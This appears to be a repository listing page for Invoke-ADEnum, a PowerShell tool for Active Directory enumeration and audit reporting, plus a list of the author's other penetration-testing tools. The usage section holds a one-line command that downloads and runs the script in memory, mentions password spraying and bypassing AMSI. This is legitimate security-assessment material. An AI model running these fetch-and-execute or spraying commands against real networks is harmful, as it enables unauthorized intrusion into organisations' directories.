Leo4j/Invoke-ADEnum Leo4j/Invoke-ADEnum

  • Stars
    star
    343
  • Rank 122,410 (Top 3 %)
  • Language
    PowerShell
  • License
    GNU General Publi...
  • Created over 1 year ago
  • Updated about 2 months ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
Leo4j/Invoke-ADEnum
github

Leo4j

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Automate Active Directory Enumeration

Invoke-ADEnum

Active Directory Enumeration

Invoke-ADEnum is an Active Directory enumeration tool designed to automate the process of gathering information from an Active Directory environment, leveraging the capabilities of PowerView.

With Invoke-ADEnum, you can quickly and efficiently enumerate various aspects of Active Directory, including forests, domains, trusts, domain controllers, users, groups, computers, shares, subnets, ACLs, OUs, GPOs, and more.

One of the features of Invoke-ADEnum is its ability to generate an Active Directory Audit Report in HTML format. Whether performing security assessments, compliance audits, or general Active Directory enumeration tasks, the report will provide a detailed overview of the Active Directory infrastructure, in an easy-to-navigate layout.

Invoke-ADEnum will generate a client-oriented report as well, which will include only relevant findings and list remediations/recommendations.

NOTE: By clicking on the tables' titles, you can generate and download a CSV version of the results. Additionally, you have the option to export the entire HTML report in XLSX format by clicking on "Active Directory Audit" at the top of the page. The XLSX export will include a separate sheet for each table of findings.

image

An offline version of the tool is also available, which won't load PowerView from the internet (useful against web filtering or lab scenarios).

Invoke-ADEnum is a tool for any IT professional working with Active Directory.

If you find Invoke-ADEnum valuable and use it in your work, please consider giving us a star on GitHub. Your support motivates the developer to continue improving and maintaining this project

Usage

Load the script in memory:

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Invoke-ADEnum/main/Invoke-ADEnum.ps1')

For usage, please refer to the Help page:

Invoke-ADEnum -Help

Check your targets first, and make sure you stay in scope

Invoke-ADEnum -TargetsOnly

Recommended Coverage

Invoke-ADEnum -SecurityGroups -GPOsRights -LAPSReadRights -RBCD -AllGroups -SprayEmptyPasswords -UserCreatedObjects

+++> NOTE: If you use -CustomURL or -Local parameters you'll have to bypass AMSI manually <+++

2023-06-03_15-25 2023-06-03_15-26_1 2023-06-03_15-27 2023-06-03_15-28

Disclaimer

Invoke-ADEnum is intended exclusively for research, education, and authorized testing. Its purpose is to assist professionals and researchers in identifying vulnerabilities and enhancing system security.

Users must secure explicit, mutual consent from all parties involved before utilizing this tool on any system, network, or digital environment, as unauthorized activities can lead to serious legal consequences. Users are responsible for adhering to all applicable laws and regulations related to cybersecurity and digital access.

The creator of Invoke-ADEnum disclaims liability for any misuse or illicit use of the tool and is not responsible for any resulting damages or losses.

More Repositories

1

Amnesiac

Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with lateral movement within Active Directory environments
PowerShell
313
star
2

Invoke-SessionHunter

Retrieve and display information about active user sessions on remote computers. No admin privileges required.
PowerShell
117
star
3

SessionExec

Execute commands in other Sessions
PowerShell
43
star
4

Invoke-SMBRemoting

Interactive Shell and Command Execution over Named-Pipes (SMB)
PowerShell
32
star
5

Practical_Ethical_Hacking_Mindmap

PenTest guide reference including tools and some commands
10
star
6

KeyCredentialLink

Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute
PowerShell
8
star
7

Invoke-WMIRemoting

Command Execution or Pseudo-Shell over WMI
PowerShell
8
star
8

Find-LocalAdminAccess

Check the Domain for Local Admin Access
PowerShell
8
star
9

Invoke-RunAsSystem

A simple script to elevate current session to SYSTEM (needs to be run as Administrator)
PowerShell
8
star
10

JRecon

A tool to automate Active Directory Enumeration
PowerShell
7
star
11

Tools

PowerShell
7
star
12

Invoke-ShareHunter

Enumerate the Domain for Readable and Writable Shares
PowerShell
7
star
13

CheckSMBSigning

Checks for SMB signing disabled on all hosts in the network
PowerShell
6
star
14

PassSpray

Domain Password Spray
PowerShell
6
star
15

Token-Impersonation

Make or Steal a Token
PowerShell
6
star
16

JMove

Lateral Movement within Windows environments
PowerShell
4
star
17

Invoke-GrabTheHash

Get the NTLM Hash for the User or Machine Account TGT held in your current session
PowerShell
4
star
18

Invoke-s4u2self

A tool that abuses s4u2self to gain access to remote hosts
PowerShell
4
star
19

Invoke-ShadowHunter

Automate accounts takeover by abusing GenericWrite/GenericAll rights to add Shadow Credentials
PowerShell
4
star
20

JBreach

PowerShell
3
star
21

CredsManager

A tool designed for efficient organisation and secure storage of credentials gathered during penetration tests
HTML
3
star
22

Collect-ADObjects

Collect Active Directory Objects
PowerShell
2
star
23

CheckWebDAVStatus

Checks for WebDAV Service Status Enabled on all hosts in the network
PowerShell
2
star
24

Validate-Credentials

Validate Domain Credentials
PowerShell
2
star
25

TGT_Monitor

Monitor for TGTs
PowerShell
2
star
26

Set-DomainObject

Modify or clear a property for a specified active directory object
PowerShell
1
star
27

Get-DNSRecords

Queries DNS records from the Active Directory domain, specifically from the DNS zones stored in the Active Directory.
PowerShell
1
star
28

ShellGen

PowerShell script to generate ShellCode in various formats
PowerShell
1
star
29

File-Server

A simple TCP file server
PowerShell
1
star